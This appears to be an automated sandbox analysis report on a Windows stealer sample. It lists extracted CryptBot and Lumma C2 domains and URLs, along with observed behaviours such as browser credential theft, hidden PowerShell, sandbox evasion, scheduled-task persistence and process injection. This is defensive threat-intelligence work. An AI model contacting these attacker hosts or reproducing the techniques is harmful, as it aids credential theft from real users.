Analysis
max time kernel: 297s
max time network: 301s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 09-09-2024 05:05
Static task: static1
Behavioral task: behavioral1
Sample: 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe
Resource: win10-20240404-en
General
Target: 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe
Size: 13.2MB
MD5: 56c671ca2f1c447d9626235f396c870a
SHA1: 3bc86393d8b3f0e20e8b49466c48c0a54a03fd61
SHA256: 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a
SHA512: 44e253da47ec0aa276cbe2abdf4186e9634eb81176a8a9263b48eda3f44346179a380c4b76c157c14740dcb3675dd91ffbf16a7f60accdaedaa58b74a2d313e6
SSDEEP: 393216:e0qJtXxO7qhaKNDJCvTV7D3OwjdAjLnDUFXoQcnU:e/t2KNJC137dAjEFSU
Malware Config
Extracted: cryptbot
analforeverlovyu.top
thirtv13sb.top
url_path: /v1/upload.php
Extracted: lumma
https://preachstrwnwjw.shop/api
https://complainnykso.shop/api
https://basedsymsotp.shop/api
https://charistmatwio.shop/api
https://grassemenwji.shop/api
https://ignoracndwko.shop/api
https://stitchmiscpaew.shop/api
https://commisionipwn.shop/api
https://tenntysjuxmz.shop/api
Signatures
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access to, or copy of, a web browser credential store.
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
86 | 3984 | rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Runs PowerShell with the display window hidden.
Processes:
pid | process
1216 | powershell.exe
1480 | powershell.exe
3212 | powershell.EXE
3488 | powershell.exe
1336 | powershell.exe
2480 | powershell.exe
3116 | powershell.exe
3064 | powershell.exe
2912 | powershell.exe
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation | DhIGibW.exe
Executes dropped EXE 13 IoCs
Processes:
pid | process
4212 | build_4.exe
4440 | build_4.exe
2136 | File1.exe
4564 | Windows.exe
4980 | service123.exe
2768 | 385104.exe
304 | Install.exe
1412 | Install.exe
2988 | service123.exe
2152 | Install.exe
1260 | service123.exe
4900 | DhIGibW.exe
2460 | service123.exe
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
Processes:
pid | process
2144 | forfiles.exe
1060 | forfiles.exe
3888 | forfiles.exe
1788 | forfiles.exe
2060 | forfiles.exe
2756 | forfiles.exe
1616 | forfiles.exe
4756 | forfiles.exe
3276 | forfiles.exe
4872 | forfiles.exe
2512 | forfiles.exe
4884 | forfiles.exe
4044 | forfiles.exe
4756 | forfiles.exe
1636 | forfiles.exe
3364 | forfiles.exe
3644 | forfiles.exe
Loads dropped DLL 23 IoCs
Processes:
pid | process
4440 | build_4.exe (18 entries)
4980 | service123.exe
2988 | service123.exe
1260 | service123.exe
3984 | rundll32.exe
2460 | service123.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | DhIGibW.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | DhIGibW.exe
Drops desktop.ini file(s) 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | Install.exe
Drops file in System32 directory 33 IoCs
Processes:
description | ioc | process
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | DhIGibW.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | rundll32.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | Install.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | DhIGibW.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | DhIGibW.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 2136 set thread context of 4216 | 2136 | File1.exe | RegAsm.exe
Drops file in Program Files directory 14 IoCs
Processes:
description | ioc | process
File created | C:\Program Files (x86)\FDxSmxakU\tpuPfd.dll | DhIGibW.exe
File created | C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\ZZJMobL.dll | DhIGibW.exe
File created | C:\Program Files (x86)\TjUkTRKCSiJkC\EwNGXZF.xml | DhIGibW.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | DhIGibW.exe
File created | C:\Program Files (x86)\tEZYwqVfuQYU2\ttspFuCPVfTdr.dll | DhIGibW.exe
File created | C:\Program Files (x86)\tEZYwqVfuQYU2\lPMjDmV.xml | DhIGibW.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | DhIGibW.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | DhIGibW.exe
File created | C:\Program Files (x86)\FDxSmxakU\hRyNhQz.xml | DhIGibW.exe
File created | C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\ESFWuTA.xml | DhIGibW.exe
File created | C:\Program Files (x86)\TjUkTRKCSiJkC\lxCvlCt.dll | DhIGibW.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | DhIGibW.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | DhIGibW.exe
File created | C:\Program Files (x86)\QSBDBQxFkAUn\gBSknPq.dll | DhIGibW.exe
Drops file in Windows directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Tasks\bOYLEOfZCACcRQIJvG.job | schtasks.exe
File created | C:\Windows\Tasks\hzhNAJUNSjjdIpELG.job | schtasks.exe
File created | C:\Windows\Tasks\FnGigHNXGPuYnow.job | schtasks.exe
File created | C:\Windows\Tasks\gXgiPdpSGbihZCqEr.job | schtasks.exe
Detects Pyinstaller 1 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe | pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
Processes:
pid | pid_target | process | target process
2060 | 2152 | WerFault.exe | Install.exe
4372 | 1412 | WerFault.exe | Install.exe
768 | 4900 | WerFault.exe | DhIGibW.exe
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
All 64 entries share the same description and ioc: Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Processes, in reported order: Install.exe, reg.exe, reg.exe, cmd.exe, powershell.exe, cmd.exe, taskkill.exe, cmd.exe, powershell.exe, powershell.exe, reg.exe, reg.exe, cmd.exe, rundll32.exe, schtasks.exe, powershell.exe, forfiles.exe, schtasks.exe, cmd.exe, forfiles.exe, reg.exe, reg.exe, schtasks.exe, cmd.exe, taskkill.exe, cmd.exe, RegAsm.exe, forfiles.exe, reg.exe, reg.exe, reg.exe, cmd.exe, reg.exe, cscript.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, powershell.exe, reg.exe, reg.exe, forfiles.exe, cmd.exe, cmd.exe, forfiles.exe, schtasks.exe, reg.exe, reg.exe, reg.exe, forfiles.exe, reg.exe, cmd.exe, WMIC.exe, reg.exe, reg.exe, schtasks.exe, cmd.exe, cmd.exe, cmd.exe, reg.exe, schtasks.exe, cmd.exe, taskkill.exe, reg.exe
Totals per process: reg.exe 20, cmd.exe 19, forfiles.exe 6, schtasks.exe 6, powershell.exe 5, taskkill.exe 3, Install.exe 1, rundll32.exe 1, RegAsm.exe 1, cscript.exe 1, WMIC.exe 1
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Windows.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Windows.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Kills process with taskkill 6 IoCs
Processes:
pid | process
4912 | taskkill.exe
792 | taskkill.exe
4464 | taskkill.exe
1556 | taskkill.exe
4128 | taskkill.exe
4484 | taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | DhIGibW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fd360b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" | Install.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | DhIGibW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | DhIGibW.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | rundll32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | Install.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | Install.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings | 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2292 | schtasks.exe
2724 | schtasks.exe
316 | schtasks.exe
4920 | schtasks.exe
2348 | schtasks.exe
3476 | schtasks.exe
860 | schtasks.exe
5016 | schtasks.exe
1976 | schtasks.exe
2152 | schtasks.exe
3504 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
1216 | powershell.exe (3 entries)
1336 | powershell.exe (3 entries)
2480 | powershell.exe (3 entries)
1480 | powershell.exe (3 entries)
3116 | powershell.exe (3 entries)
3064 | powershell.exe (3 entries)
4232 | powershell.exe (3 entries)
3024 | powershell.exe (3 entries)
3212 | powershell.EXE (3 entries)
3488 | powershell.exe (3 entries)
2912 | powershell.exe (3 entries)
4900 | DhIGibW.exe (31 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4912 | taskkill.exe
Token: SeDebugPrivilege | 792 | taskkill.exe
Token: SeDebugPrivilege | 4464 | taskkill.exe
Token: SeDebugPrivilege | 1216 | powershell.exe
Token: SeDebugPrivilege | 1336 | powershell.exe
Token: SeDebugPrivilege | 1556 | taskkill.exe
Token: SeDebugPrivilege | 4128 | taskkill.exe
Token: SeDebugPrivilege | 4484 | taskkill.exe
Token: SeDebugPrivilege | 2480 | powershell.exe
Token: SeDebugPrivilege | 1480 | powershell.exe
Token: SeDebugPrivilege | 3116 | powershell.exe
The following sequence of 21 tokens is reported twice in a row for pid 4396 WMIC.exe (42 entries):
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 4396 | WMIC.exe
Token: SeDebugPrivilege | 3064 | powershell.exe
Token: SeDebugPrivilege | 4232 | powershell.exe
Token: SeDebugPrivilege | 3024 | powershell.exe
Token: SeDebugPrivilege | 3212 | powershell.EXE
Token: SeDebugPrivilege | 3488 | powershell.exe
Token: SeDebugPrivilege | 2912 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 4512 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 4512 | WMIC.exe
Token: SeSecurityPrivilege | 4512 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 4512 | WMIC.exe
Token: SeLoadDriverPrivilege | 4512 | WMIC.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe, WScript.exe, build_4.exe, build_4.exe, cmd.exe, cscript.exe, cmd.exe, cmd.exe, cscript.exe, cmd.exe, cmd.exe, cscript.exe, cmd.exe, powershell.exe, File1.exe
description | pid | process | target process
PID 2368 wrote to memory of 96 | 2368 | 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe | WScript.exe
PID 2368 wrote to memory of 96 | 2368 | 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe | WScript.exe
PID 2368 wrote to memory of 96 | 2368 | 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe | WScript.exe
PID 96 wrote to memory of 4212 | 96 | WScript.exe | build_4.exe
PID 96 wrote to memory of 4212 | 96 | WScript.exe | build_4.exe
PID 96 wrote to memory of 4212 | 96 | WScript.exe | build_4.exe
PID 4212 wrote to memory of 4440 | 4212 | build_4.exe | build_4.exe
PID 4212 wrote to memory of 4440 | 4212 | build_4.exe | build_4.exe
PID 4212 wrote to memory of 4440 | 4212 | build_4.exe | build_4.exe
PID 4440 wrote to memory of 4632 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 4632 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 4632 | 4440 | build_4.exe | cmd.exe
PID 4632 wrote to memory of 856 | 4632 | cmd.exe | cscript.exe
PID 4632 wrote to memory of 856 | 4632 | cmd.exe | cscript.exe
PID 4632 wrote to memory of 856 | 4632 | cmd.exe | cscript.exe
PID 856 wrote to memory of 2832 | 856 | cscript.exe | cmd.exe
PID 856 wrote to memory of 2832 | 856 | cscript.exe | cmd.exe
PID 856 wrote to memory of 2832 | 856 | cscript.exe | cmd.exe
PID 4440 wrote to memory of 1660 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 1660 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 1660 | 4440 | build_4.exe | cmd.exe
PID 2832 wrote to memory of 4912 | 2832 | cmd.exe | taskkill.exe
PID 2832 wrote to memory of 4912 | 2832 | cmd.exe | taskkill.exe
PID 2832 wrote to memory of 4912 | 2832 | cmd.exe | taskkill.exe
PID 4440 wrote to memory of 4476 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 4476 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 4476 | 4440 | build_4.exe | cmd.exe
PID 4476 wrote to memory of 1880 | 4476 | cmd.exe | cscript.exe
PID 4476 wrote to memory of 1880 | 4476 | cmd.exe | cscript.exe
PID 4476 wrote to memory of 1880 | 4476 | cmd.exe | cscript.exe
PID 1880 wrote to memory of 4940 | 1880 | cscript.exe | cmd.exe
PID 1880 wrote to memory of 4940 | 1880 | cscript.exe | cmd.exe
PID 1880 wrote to memory of 4940 | 1880 | cscript.exe | cmd.exe
PID 4440 wrote to memory of 2600 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 2600 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 2600 | 4440 | build_4.exe | cmd.exe
PID 4940 wrote to memory of 792 | 4940 | cmd.exe | taskkill.exe
PID 4940 wrote to memory of 792 | 4940 | cmd.exe | taskkill.exe
PID 4940 wrote to memory of 792 | 4940 | cmd.exe | taskkill.exe
PID 4440 wrote to memory of 1216 | 4440 | build_4.exe | powershell.exe
PID 4440 wrote to memory of 1216 | 4440 | build_4.exe | powershell.exe
PID 4440 wrote to memory of 1216 | 4440 | build_4.exe | powershell.exe
PID 4440 wrote to memory of 2796 | 4440 | build_4.exe | cmd.exe
